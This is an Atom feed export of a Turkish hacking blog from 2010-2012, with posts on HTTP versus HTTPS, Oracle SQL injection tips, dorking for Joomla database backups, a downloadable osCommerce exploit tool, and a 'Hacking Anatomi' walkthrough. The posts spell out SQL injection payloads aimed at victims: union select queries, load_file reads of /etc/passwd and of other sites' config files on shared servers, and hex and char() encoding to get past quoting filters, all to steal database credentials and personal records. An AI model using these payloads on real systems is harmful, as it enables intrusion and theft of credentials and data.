<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" gd:etag="W/&quot;CEUBQngzfCp7ImA9WhRaFEU.&quot;"><id>tag:blogger.com,1999:blog-4818381281339221921</id><updated>2012-02-17T04:37:33.684-08:00</updated><category term="vezir" /><category term="linux" /><category term="script çekme" /><category term="Vezir.04" /><category term="char" /><category term="rfi açığının kapatılması" /><category term="win server" /><category term="joomla" /><category term="04" /><category term="rfi açığı" /><category term="program" /><category term="Oracle" /><category term="rfi nedir?" /><category term="blog" /><category term="hack programı" /><category term="root" /><category term="yedek" /><category term="null" /><category term="Agd_scorp" /><category term="osCommerce Online Merchant" /><category term="' or ' 1=1" /><category term="sql" /><category term="shell" /><category term="server root" /><category term="joomla sql yedek arama" /><category term="windows" /><category term="c99" /><category term="Vezir Blog" /><category term="cmd" /><category term="bypass" /><category term="r57" /><title>Error 404 : "Vezirist "</title><subtitle type="html" /><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://vezirist.blogspot.com/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://vezirist.blogspot.com/" /><author><name>Vezir.04</name><uri>http://www.blogger.com/profile/02406787707276955003</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="24" height="32" src="http://2.bp.blogspot.com/-yqqUABA9vbg/TkZ-wbN81GI/AAAAAAAAACU/Hestb39hh18/s220/268428_10150251053314831_572829830_7105300_7388330_n.jpg" /></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>12</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/VezirinInternetGnl" /><feedburner:info uri="vezirininternetgnl" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><entry gd:etag="W/&quot;CEUBQngyfCp7ImA9WhRaFEU.&quot;"><id>tag:blogger.com,1999:blog-4818381281339221921.post-7024302943184272374</id><published>2012-02-17T04:14:00.005-08:00</published><updated>2012-02-17T04:37:33.694-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-02-17T04:37:33.694-08:00</app:edited><title>Http ve Https Arasindaki Fark</title><content type="html">Merhaba arkadaşlar uzun süredir pek ilgilenmiyorum .İş , okul derken pek zaman kalmıyor.&lt;br /&gt;Bügün size aslında internete her girdiğimizde gördüğümüz ama ne işe yaradığını bilmediğimiz http ve https arasındaki farkı açıklamaya çalışacam . &lt;br /&gt;&lt;br /&gt;Https (Hyper Text Transfer Protocol Secure) genel olarak banka sistemleri , kredi kartı ile alışveriş yapılan ve diğer güvenliğine önem veren firmalara tarafından yaygın olarak kullanılır . Çünkü https de giriş yaptığınızda bilgileriniz sizin ve giriş yaptığınız adres tarafından okunabilecek şekilde şifrelenir.Http de ise böyle bir şifreleme yoktur.Sizin giriş yaptığınız verilere başka kişiler ulaşabilir .&lt;br /&gt;&lt;br /&gt;Ek olarak eklemek isteyeceğim bir şey daha var .Dün gece Ttnet borcunu ödemeyi unuttuğum için internet bağlanmaya çalıştığım zaman ttnet borç ödeme ekranına yönleniyordu . http://siteadi.com/   diye siteye bağlanmaya çalıştığım zaman ttnet borc ödeme ekranı çıkıyordu .http:// yerine https://siteadi.com/ diye girdiğim zaman ttnet borc ödeme ekranı çıkmadan rahatlıkla internete bağlanabiliyorsunuz .&lt;br /&gt;Bir daha ki sefer görüşmek dileğiyle .&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4818381281339221921-7024302943184272374?l=vezirist.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/d2EsX0RNswVVoznQiDc3apzj5Xk/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/d2EsX0RNswVVoznQiDc3apzj5Xk/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/d2EsX0RNswVVoznQiDc3apzj5Xk/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/d2EsX0RNswVVoznQiDc3apzj5Xk/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/VezirinInternetGnl/~4/Si-TopXUNE4" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://vezirist.blogspot.com/feeds/7024302943184272374/comments/default" title="Kayıt Yorumları" /><link rel="replies" type="text/html" href="http://vezirist.blogspot.com/2012/02/http-ve-https-arasindaki-fark.html#comment-form" title="0 Yorum" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4818381281339221921/posts/default/7024302943184272374?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4818381281339221921/posts/default/7024302943184272374?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VezirinInternetGnl/~3/Si-TopXUNE4/http-ve-https-arasindaki-fark.html" title="Http ve Https Arasindaki Fark" /><author><name>Vezir.04</name><uri>http://www.blogger.com/profile/02406787707276955003</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="24" height="32" src="http://2.bp.blogspot.com/-yqqUABA9vbg/TkZ-wbN81GI/AAAAAAAAACU/Hestb39hh18/s220/268428_10150251053314831_572829830_7105300_7388330_n.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://vezirist.blogspot.com/2012/02/http-ve-https-arasindaki-fark.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEIERHo8cCp7ImA9WhdREEQ.&quot;"><id>tag:blogger.com,1999:blog-4818381281339221921.post-8148375755179648560</id><published>2011-07-30T01:51:00.000-07:00</published><updated>2011-07-31T00:15:05.478-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-07-31T00:15:05.478-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="char" /><category scheme="http://www.blogger.com/atom/ns#" term="null" /><category scheme="http://www.blogger.com/atom/ns#" term="Agd_scorp" /><category scheme="http://www.blogger.com/atom/ns#" term="Oracle" /><title>Oracle'de püf noktalar</title><content type="html">Oracle'de sql kasmak isteyenler için bir kaç püf noktaya değinecem ; oracle da veri tipleri uyuşmadığından null,null diye başlarsıniz.&lt;br /&gt;&lt;br /&gt;from all_tables dersiniz information_schema.tables karşılığıdır&lt;br /&gt;&lt;br /&gt;from kullanmadan select çekemezsin&lt;br /&gt;&lt;br /&gt;all_tab_columns &lt; bu da  information_schema.columns karşılığı&lt;br /&gt;&lt;br /&gt;table_name column_name kolon adları aynı&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;union select version from all_Tables veya union select user from all_Tables&lt;br /&gt;&lt;br /&gt;diye deneme yapcaksıniz geri döndürüyosa char kolonu tutturmuşsunuz&lt;br /&gt;&lt;br /&gt;yoksa  blind kasarsıniz sonra tabloları kullanıcına göre çekmek istiyosaniz where owner=user diceksiniz&lt;br /&gt;&lt;br /&gt;all_tables tan table_name çekersen yetki olan tüm tablo adlarını verir&lt;br /&gt;&lt;br /&gt;ama sonra onları doğrudan from tablo şeklinde çekebilmeniz için çektiğiniz tablonun kendi kullanıcı adında olması lazm&lt;br /&gt;&lt;br /&gt;yoksa owner ını da çekip başına misal from KULLANICI.TABLO yazarsıniz bi de oracle da tüm tablo kolon adları büyük harftir&lt;br /&gt;&lt;br /&gt;sistem tabloları hariç&lt;br /&gt;&lt;br /&gt;Oracle'de hex kullanılmaz chr (ascii tablosu) kullanilir&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;birleştirme yapmak için&lt;br /&gt;&lt;br /&gt;mysql de concat()&lt;br /&gt;mssql de +&lt;br /&gt;oracle da ||&lt;br /&gt;postgre de ||&lt;br /&gt;kullanılır&lt;br /&gt;birleştirme yapmak için&lt;br /&gt;misal&lt;br /&gt;union select AD||'|SOYAD from OGRENCI&lt;br /&gt;misal&lt;br /&gt;322 union select null,null,AD||' '||SOYAD||'|MESLEK||'|SIFRE,null,null,null,null,null,null from DURUM.PERSONEL where AD='YASİR'&lt;br /&gt;&lt;br /&gt;mesela yazıyı charlayıp yollayacaksanız &lt;br /&gt;&lt;br /&gt;char(42)+char(352)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;bu şekilde ama  url den get ile gönderdiğinde + lar boşluk algılanır o yüzden&lt;br /&gt;&lt;br /&gt;char(42)%2bchar(352)&lt;br /&gt;&lt;br /&gt;şeklinde yazacaksıniz %2b   + nın karşılığıdır&lt;br /&gt;&lt;br /&gt;Bügünlük bu kadar yeter Bir dahaki sefere de oracle'de like kullanımını anlatacam.&lt;br /&gt;&lt;br /&gt;Agd_Scorp'da burda teşşekürlerimi iletiyorum.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4818381281339221921-8148375755179648560?l=vezirist.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/DoJC3-r2ZfNDEsnIEEWv6aIYFnc/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/DoJC3-r2ZfNDEsnIEEWv6aIYFnc/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/DoJC3-r2ZfNDEsnIEEWv6aIYFnc/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/DoJC3-r2ZfNDEsnIEEWv6aIYFnc/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/VezirinInternetGnl/~4/GwM9kpcK2bo" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://vezirist.blogspot.com/feeds/8148375755179648560/comments/default" title="Kayıt Yorumları" /><link rel="replies" type="text/html" href="http://vezirist.blogspot.com/2011/07/oraclede-puf-noktalar.html#comment-form" title="1 Yorum" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4818381281339221921/posts/default/8148375755179648560?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4818381281339221921/posts/default/8148375755179648560?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VezirinInternetGnl/~3/GwM9kpcK2bo/oraclede-puf-noktalar.html" title="Oracle'de püf noktalar" /><author><name>Vezir.04</name><uri>http://www.blogger.com/profile/02406787707276955003</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="24" height="32" src="http://2.bp.blogspot.com/-yqqUABA9vbg/TkZ-wbN81GI/AAAAAAAAACU/Hestb39hh18/s220/268428_10150251053314831_572829830_7105300_7388330_n.jpg" /></author><thr:total>1</thr:total><feedburner:origLink>http://vezirist.blogspot.com/2011/07/oraclede-puf-noktalar.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkINQ3c-eyp7ImA9WhZaFkU.&quot;"><id>tag:blogger.com,1999:blog-4818381281339221921.post-6679105064893623679</id><published>2011-07-03T01:00:00.000-07:00</published><updated>2011-07-03T01:09:52.953-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-07-03T01:09:52.953-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="sql" /><category scheme="http://www.blogger.com/atom/ns#" term="joomla" /><category scheme="http://www.blogger.com/atom/ns#" term="joomla sql yedek arama" /><category scheme="http://www.blogger.com/atom/ns#" term="yedek" /><title>Joomla sql yedeklerine ulaşmak.</title><content type="html">Bu yöntemle google üzerinden arama yaparak joomla kullanan sitelerin sql yedeklerine nasıl ulaşılır onu gösterecem.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-w265zmvpZ04/Tfryubtz4CI/AAAAAAAAID8/XgRbQrzDqxk/s1600/joomla_sql_md5_1.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 714px; height: 141px;" src="http://1.bp.blogspot.com/-w265zmvpZ04/Tfryubtz4CI/AAAAAAAAID8/XgRbQrzDqxk/s1600/joomla_sql_md5_1.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Şekil 1: &lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-mJD20TxwyHc/Tfryuuwu2NI/AAAAAAAAIEE/e7lDzx7lzmE/s1600/joomla_sql_md5_2.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 753px; height: 138px;" src="http://1.bp.blogspot.com/-mJD20TxwyHc/Tfryuuwu2NI/AAAAAAAAIEE/e7lDzx7lzmE/s1600/joomla_sql_md5_2.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Şekil 2: &lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/-T3Mz8LDKqVw/TfryvKRDjKI/AAAAAAAAIEM/MY9NuLbUCJo/s1600/joomla_sql_md5_3.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 682px; height: 135px;" src="http://4.bp.blogspot.com/-T3Mz8LDKqVw/TfryvKRDjKI/AAAAAAAAIEM/MY9NuLbUCJo/s1600/joomla_sql_md5_3.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Şekil 3:&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4818381281339221921-6679105064893623679?l=vezirist.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/-Qu9p3RT4FZE6f1LlBZvTrS0lGg/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/-Qu9p3RT4FZE6f1LlBZvTrS0lGg/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/-Qu9p3RT4FZE6f1LlBZvTrS0lGg/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/-Qu9p3RT4FZE6f1LlBZvTrS0lGg/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/VezirinInternetGnl/~4/APa3FbrP9-k" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://vezirist.blogspot.com/feeds/6679105064893623679/comments/default" title="Kayıt Yorumları" /><link rel="replies" type="text/html" href="http://vezirist.blogspot.com/2011/07/joomla-sql-yedeklerine-ulasmak.html#comment-form" title="0 Yorum" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4818381281339221921/posts/default/6679105064893623679?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4818381281339221921/posts/default/6679105064893623679?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VezirinInternetGnl/~3/APa3FbrP9-k/joomla-sql-yedeklerine-ulasmak.html" title="Joomla sql yedeklerine ulaşmak." /><author><name>Vezir.04</name><uri>http://www.blogger.com/profile/02406787707276955003</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="24" height="32" src="http://2.bp.blogspot.com/-yqqUABA9vbg/TkZ-wbN81GI/AAAAAAAAACU/Hestb39hh18/s220/268428_10150251053314831_572829830_7105300_7388330_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-w265zmvpZ04/Tfryubtz4CI/AAAAAAAAID8/XgRbQrzDqxk/s72-c/joomla_sql_md5_1.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://vezirist.blogspot.com/2011/07/joomla-sql-yedeklerine-ulasmak.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkIMQnwzfip7ImA9Wx9TF00.&quot;"><id>tag:blogger.com,1999:blog-4818381281339221921.post-7272489907853425551</id><published>2010-11-25T08:59:00.000-08:00</published><updated>2010-11-25T09:03:03.286-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-11-25T09:03:03.286-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="program" /><category scheme="http://www.blogger.com/atom/ns#" term="osCommerce Online Merchant" /><category scheme="http://www.blogger.com/atom/ns#" term="hack programı" /><title>osCommerce Online Merchant</title><content type="html">Merhaba arkadaşlar bügün size  osCommerce Online Merchant   sistemindeki açık için kodlanmış programın kulanımını anlatmaya çalıştım.Video yu izleyin anlamadığınız yer olursa söylersiniz &lt;br /&gt;&lt;br /&gt;http://osc.eclass.tw/images/vezir.rar&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4818381281339221921-7272489907853425551?l=vezirist.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/NUrC1DJfVNv3tRdwnW9QD83Yz-o/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/NUrC1DJfVNv3tRdwnW9QD83Yz-o/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/NUrC1DJfVNv3tRdwnW9QD83Yz-o/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/NUrC1DJfVNv3tRdwnW9QD83Yz-o/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/VezirinInternetGnl/~4/_ZATM26fM1M" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://vezirist.blogspot.com/feeds/7272489907853425551/comments/default" title="Kayıt Yorumları" /><link rel="replies" type="text/html" href="http://vezirist.blogspot.com/2010/11/oscommerce-online-merchant.html#comment-form" title="1 Yorum" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4818381281339221921/posts/default/7272489907853425551?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4818381281339221921/posts/default/7272489907853425551?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VezirinInternetGnl/~3/_ZATM26fM1M/oscommerce-online-merchant.html" title="osCommerce Online Merchant" /><author><name>Vezir.04</name><uri>http://www.blogger.com/profile/02406787707276955003</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="24" height="32" src="http://2.bp.blogspot.com/-yqqUABA9vbg/TkZ-wbN81GI/AAAAAAAAACU/Hestb39hh18/s220/268428_10150251053314831_572829830_7105300_7388330_n.jpg" /></author><thr:total>1</thr:total><feedburner:origLink>http://vezirist.blogspot.com/2010/11/oscommerce-online-merchant.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkMBQnw7cSp7ImA9WhdTF08.&quot;"><id>tag:blogger.com,1999:blog-4818381281339221921.post-530334498862821021</id><published>2010-10-18T12:27:00.000-07:00</published><updated>2011-07-15T03:07:33.209-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-07-15T03:07:33.209-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="linux" /><category scheme="http://www.blogger.com/atom/ns#" term="windows" /><category scheme="http://www.blogger.com/atom/ns#" term="vezir" /><title>Hacking Anatomi</title><content type="html">Herhangi bir sitede SQL tespit ettigimizi varsayalım ,&lt;br /&gt;Aslında amacımız bu sitedekı SQL  zaafiyatını kullanarak serverdaki diger sitenin&lt;br /&gt;db’sine erismek. Burda MySQL’in uzaktan istege acık oldugunu + serverin Linux dagıtımlarından birini kullandıgını varsayıyorum.&lt;br /&gt;Yapacagımız ilk is MySQL Sorgularını , kurbanın sitesinde servera isletmek olcaktır.&lt;br /&gt;&lt;br /&gt;**********&lt;br /&gt;ozn.php?id=1+and+1=1  yaptığımızda 1=1 olduğundan true döner&lt;br /&gt;&lt;br /&gt;ozn.php?id=1+and+1=2  yaptığmızda ise 1=2 olmadığı için true dönmez yani yanlışlığı algılar ve hata verir şimdi kolon sayısını&lt;br /&gt;&lt;br /&gt;öğreniyoruz&lt;br /&gt;&lt;br /&gt;ozn.php?=1order+by+6-- &lt;br /&gt;&lt;br /&gt;*yaptık sayfa hata verdi&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ozn.php?id=1+order+by+7–- &lt;br /&gt;&lt;br /&gt;*bu şekil yaptık sayfa hata vermeden açıldı&lt;br /&gt;&lt;br /&gt;* kolon sayısını ogrendik 7&lt;br /&gt;&lt;br /&gt;ozn.php?id=1/**/union/**/select/**/0,1,2,3,4,5,6,7/*&lt;br /&gt;&lt;br /&gt;3 4&lt;br /&gt;&lt;br /&gt;* Kolon sayısınının esit oldugunu soyluyor.&lt;br /&gt;&lt;br /&gt;ozn.php?id=-1+union+select+0,1,2,load_file(/etc/passwd),4,5,6,7/* &lt; Linux All&lt;br /&gt;&lt;br /&gt;*Linux da “userler”in yetkılerıne temelli sahibiz,&lt;br /&gt;&lt;br /&gt;*Windows icin de aynı sey gecerlidir.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;* Eger Makina Windows olsaydı..&lt;br /&gt;&lt;br /&gt;boot.ini‘yi okuyabiliriz , engel varsa hexleriz.&lt;br /&gt;&lt;br /&gt;select ‘c:/boot.ini’&lt;br /&gt;&lt;br /&gt;select 0×633a2f626f6f742e696e69 &lt;br /&gt;&lt;br /&gt;Domainler ” C:/Inetpub ” burada.&lt;br /&gt;&lt;br /&gt;ozn.php?id=-1+union+select+0,1,2,load_file(0×633a2f626f6f742e6 96e69),4,5,6,7/*&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Blind Edebiliriz !&lt;br /&gt;&lt;br /&gt;substring(load_file(’c:/boot.ini’),58) &lt;br /&gt;&lt;br /&gt;” [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(2)\WINDOW S …”&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Windows icinde asagıda goreceginiz teknıkler birebir aynıdır.. Extra uzerınde durmaya gerek yok.&lt;br /&gt;&lt;br /&gt;Simdi konumuza geri donelım;&lt;br /&gt;&lt;br /&gt;*Kullanıcı adı ve dizinlerin bulundugu yerı ogrenmem icin etcleri listelemem gerekli.&lt;br /&gt;Eger bunu yapamazsanız servera hata verdirip ana dizin yolu ogrenebilirsiniz; ama bu sadece uzerinde calıstıgımız&lt;br /&gt;site icin gecerli olacaktır.&lt;br /&gt;&lt;br /&gt;Bu tip karakterlerin(’,-) serverda islemedigi durumlarda kurdugumuz sorguları hexleriz veya ascii koda cevirip sorguya&lt;br /&gt;dahil ederiz.&lt;br /&gt;Neden bu karakterle pasif olur peki ?&lt;br /&gt;php.ini deki “magic_quotes_gpc” direktifinin “On” olmasıdır. Dolayısyla numerik dısında gelen sayıları ters slash’a “\,/”&lt;br /&gt;cevirecektir.&lt;br /&gt;&lt;br /&gt;Calısma mantıgı ,&lt;br /&gt;&lt;br /&gt;(int) , intval(GET),POST,COOKİE) , addslashes() ile aynı isleve sahiptir.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;- UYGULAMA - &lt;br /&gt;&lt;br /&gt;/**/union/**/select/**/0,1,2,load_file(/etc/passwd),4,5,6,7/*&lt;br /&gt;&lt;br /&gt;Eger engel varsa ;&lt;br /&gt;&lt;br /&gt;&gt; &gt; ozn.php?=88888881 union select 0,1,2,unhex(hex(/etc/passwd),4,5,6,7 &lt;br /&gt;&lt;br /&gt;// Serverda ki tüm kullanıcı adları ve konumlandıgı klasörler karsımızda.&lt;br /&gt;&lt;br /&gt;Target “ozn"&lt;br /&gt;&lt;br /&gt;/home/ozn/httpdocs:&lt;br /&gt;/home/site/httpdocs:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Amacımız ozn adlı kurbanın dbsini ele gecirmek , Bunun icin ozn adlı hedefin&lt;br /&gt;db bilgilerinin saklandıgı dosyayı bulmak gereklı , genelde “config.php” , main.php , common.php olur&lt;br /&gt;Uzamasın diye kısaltalım biraz “httpdocs” adlı klasorde “main.php” oldugunu varsayıyorum&lt;br /&gt;soyle bir ıstekde bulunuyorum ;&lt;br /&gt;&lt;br /&gt;/**/union+select+0,1,2,load_file(/home/victim2/httpdocs/main.php),4,5,6,7/* &lt;br /&gt;&lt;br /&gt;* Burada gene hexleyecegız parantez icindekı karakterleri.&lt;br /&gt;&lt;br /&gt;/**/union/**/select/**/0,1,2,load_file(0×2F686F6D652F76696374696D322F6874 7470646F63732F6D61696E2E706870),4,5,6,7/*&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Syntax Hataları ve Çözümleri&lt;br /&gt;&lt;br /&gt;Alternatif durumlar da goreve dahil ettigimiz MySQL katarları : “char” , “concat” , “blob” , “varchar” …&lt;br /&gt;&lt;br /&gt;Serverda ” magic_quotes_gpc = On ” direktifi aktif oldugunda ;&lt;br /&gt;&lt;br /&gt;ozn.php?id=88888881 union select 0,1,2,3,4,5,6,7 &lt;br /&gt;&lt;br /&gt;3 4&lt;br /&gt;&lt;br /&gt;/home/victim2/httpdocs/main.php &lt; Go to ascıı code converted&lt;br /&gt;&lt;br /&gt;ozn.php?=88888881 union select 0,1,2,load_file(char(/home/ozn/httpdocs/main.php))),4,5,6,7 &lt;br /&gt;&lt;br /&gt;ozn.php?=88888881 union select 0,1,2,load_file(concat(char(47,104,111,109,101,47, 118,105,99,116,105,109,50,47,104,116,116,112,100,1 11,99,115,47,109,97,105,110,46,112,104,112)))),4,5 ,6,7&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;“information_schema” adlı databaseden satırları okuyarak tüm db isimleri ve kolon+satırları elde ederiz.&lt;br /&gt;&lt;br /&gt;/**/union/**/select/**/0,1,2,concat(COLUMN_NAME,0×2020,TABLE_NAME,0×2020, TABLE_SCHEMA),4,5,6,7+from+information_schema.colu mns+limit+1,8/*&lt;br /&gt;&lt;br /&gt;1 kayıttan baslıyoruz , 8. son kayıta kadar sorguluyoruz.&lt;br /&gt;&lt;br /&gt;Example :&lt;br /&gt;&lt;br /&gt;SELECT * FROM `users` LIMIT 1, 8 &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/**/union/**/select/**/0,1,2,concat(table_name),4,5,6,7+from+information_ schema.tables+where=’DB_NAME’+limit 1,8/*&lt;br /&gt;&lt;br /&gt;Engel oldugunu varsayıyorum ,&lt;br /&gt;&lt;br /&gt;union select 0,1,2 unhex((hex(table_name))) 4,5,6,7 from information_schema.tables where char(ascicode(DB_NAME)) limit 1,8&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;* Yukarıda load_file ile yaptıgım atağın sonucu geldı.&lt;br /&gt;&lt;br /&gt;&lt;?&lt;br /&gt;// Database Server&lt;br /&gt;$forum_server = “localhost”; // Ben yerel sunucumu (Localhost) ele alıyorum.&lt;br /&gt;// Database User Name&lt;br /&gt;$forum_un = “root”;&lt;br /&gt;// Database Password&lt;br /&gt;$forum_pw = “123”;&lt;br /&gt;// Database name&lt;br /&gt;$forum_database = “SQL”;&lt;br /&gt;?&gt;&lt;br /&gt;&lt;br /&gt;Serverdakı dizinleri okuyup ozn adlı userin veritabanı baglantı&lt;br /&gt;bilgilerini ele gecirdik , yani anahtarı aldık..&lt;br /&gt;&lt;br /&gt;Hatasız kul olmaz Hata varsa düzeltirsin :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4818381281339221921-530334498862821021?l=vezirist.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/qPQg23T1gvJqa9blA7VL3ZdkpiE/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/qPQg23T1gvJqa9blA7VL3ZdkpiE/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
